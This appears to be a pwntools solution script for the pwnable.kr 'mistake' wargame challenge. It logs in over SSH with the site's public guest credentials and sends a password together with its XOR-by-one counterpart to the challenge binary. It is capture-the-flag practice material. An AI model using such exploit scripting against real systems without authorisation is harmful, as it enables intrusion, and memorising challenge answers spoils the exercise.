parksjin01/pwnable.kr mistake writeup.md

## pwnable.kr mistake writeup.md

      
    Raw
  

              pwnable.kr mistake writeup.md
            
          
    from pwn import *
import time
sh = ssh(host='pwnable.kr', user='mistake', password='guest', port=2222)
passwd = raw_input(text.green_on_black('Plz type password(password should be 10 chars)')).strip()
while len(passwd) != 10:
        passwd = raw_input(text.green_on_black('Plz type password(password should be 10 chars)'))
chpasswd = ''
for i in passwd:
        chpasswd += chr(ord(i)^1)
proc = sh.process('/home/mistake/mistake')
proc.recv(1024)
proc.sendline(passwd)
proc.sendline(chpasswd)
print proc.recv(1024)